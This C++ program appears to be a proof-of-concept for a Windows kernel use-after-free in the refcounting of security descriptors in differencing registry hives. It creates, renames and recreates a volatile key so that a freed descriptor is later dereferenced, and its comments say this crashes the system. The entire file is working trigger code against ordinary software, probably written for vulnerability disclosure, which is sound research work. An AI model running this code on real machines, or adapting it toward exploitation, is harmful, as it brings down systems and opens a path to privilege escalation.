#define WIN32_NO_STATUS
#include <Windows.h>
#undef WIN32_NO_STATUS
#include <winternl.h>
#include <ntstatus.h>
#include <sddl.h>

#include <cstdio>

#pragma comment(lib, "ntdll")

extern "C" {

NTSTATUS NTAPI NtOpenKey(PHKEY, ACCESS_MASK, POBJECT_ATTRIBUTES);

}  // extern "C"

int main() {
  HKEY hHiveList, hLayeredRoot;
  WCHAR wchValueName[200];
  DWORD cchValueName;
  LSTATUS st;
  NTSTATUS Status;

  //
  // Find a differencing hive pointing at HKCU.
  //

  st = RegOpenKeyExW(HKEY_LOCAL_MACHINE,
                     L"SYSTEM\\CurrentControlSet\\Control\\hivelist",
                     0,
                     KEY_READ,
                     &hHiveList);

  if (st != ERROR_SUCCESS) {
    printf("RegOpenKeyExW failed with error %d\n", st);
    return 1;
  }

  for (DWORD dwIndex = 0;; dwIndex++) {
    cchValueName = sizeof(wchValueName) / sizeof(WCHAR);

    st = RegEnumValueW(hHiveList,
                       dwIndex,
                       wchValueName,
                       &cchValueName,
                       NULL,
                       NULL,
                       NULL,
                       NULL);

    if (st != ERROR_SUCCESS) {
      printf("RegEnumValueW failed with error %d\n", st);
      return 1;
    }

    if (!_wcsnicmp(wchValueName, L"\\REGISTRY\\WC\\Silo", 17) &&
        !_wcsicmp(&wchValueName[cchValueName - 8], L"user_sid")) {
      break;
    }
  }

  RegCloseKey(hHiveList);

  //
  // Open the root of the differencing hive.
  //

  UNICODE_STRING LayeredKeyPath;
  RtlInitUnicodeString(&LayeredKeyPath, wchValueName);

  OBJECT_ATTRIBUTES ObjectAttributes;
  InitializeObjectAttributes(&ObjectAttributes, &LayeredKeyPath, 0, NULL, NULL);

  Status = NtOpenKey(&hLayeredRoot, KEY_ALL_ACCESS, &ObjectAttributes);

  if (!NT_SUCCESS(Status)) {
    printf("NtOpenKey failed with error %x\n", Status);
    return 1;
  }

  //
  // Create key "A" in the differencing hive with a unique security descriptor.
  //

  SECURITY_ATTRIBUTES sa;
  sa.nLength = sizeof(SECURITY_ATTRIBUTES);
  sa.bInheritHandle = FALSE;

  CONST WCHAR* szSD1 = L"D:(A;;KA;;;WD)"; // Allow KEY_ALL_ACCESS for Everyone.

  if (!ConvertStringSecurityDescriptorToSecurityDescriptorW(
        szSD1, SDDL_REVISION_1, &sa.lpSecurityDescriptor, NULL)) {
    printf("ConvertStringSecurityDescriptorToSecurityDescriptorW failed with "
           "error %u\n", GetLastError());
    return 1;
  }

  HKEY hTestKey1;
  st = RegCreateKeyExW(hLayeredRoot,
                       L"A",
                       0,
                       NULL,
                       REG_OPTION_VOLATILE,
                       KEY_ALL_ACCESS,
                       &sa,
                       &hTestKey1,
                       NULL);

  if (st != ERROR_SUCCESS) {
    printf("RegCreateKeyExW failed with error %d\n", st);
    return 1;
  }

  //
  // Rename the new key to "B", making "A" a tombstone and triggering the bad
  // refcounting of security descriptors.
  //

  st = RegRenameKey(hTestKey1, NULL, L"B");

  if (st != ERROR_SUCCESS) {
    printf("RegRenameKey failed with error %d\n", st);
    return 1;
  }

  //
  // Create a new key with the name "A" and a unique security descriptor, which
  // replaces the existing tombstone and frees the original key's descriptor.
  //

  // Allow KEY_READ for World and KEY_ALL_ACCESS for Administrators.
  CONST WCHAR* szSD2 = L"D:(A;;KR;;;WD)(A;;KA;;;BA)";

  if (!ConvertStringSecurityDescriptorToSecurityDescriptorW(
          szSD2, SDDL_REVISION_1, &sa.lpSecurityDescriptor, NULL)) {
    printf("ConvertStringSecurityDescriptorToSecurityDescriptorW failed with "
           "error %u\n", GetLastError());
    return 1;
  }

  HKEY hTestKey2;
  st = RegCreateKeyExW(hLayeredRoot,
                       L"A",
                       0,
                       NULL,
                       REG_OPTION_VOLATILE,
                       KEY_READ,
                       &sa,
                       &hTestKey2,
                       NULL);

  if (st != ERROR_SUCCESS) {
    printf("RegCreateKeyExW failed with error %d\n", st);
    return 1;
  }

  //
  // Request the security descriptor of the first key, which should result in
  // dereferencing a freed kernel pool pointer and a crash.
  //

  DWORD cbSecurityDescriptor = 0;
  st = RegGetKeySecurity(hTestKey1,
                         DACL_SECURITY_INFORMATION,
                         NULL,
                         &cbSecurityDescriptor);

  if (st != ERROR_SUCCESS) {
    printf("RegGetKeySecurity failed with error %d\n", st);
    return 1;
  }

  RegCloseKey(hLayeredRoot);
  RegCloseKey(hTestKey1);
  RegCloseKey(hTestKey2);

  return 0;
}
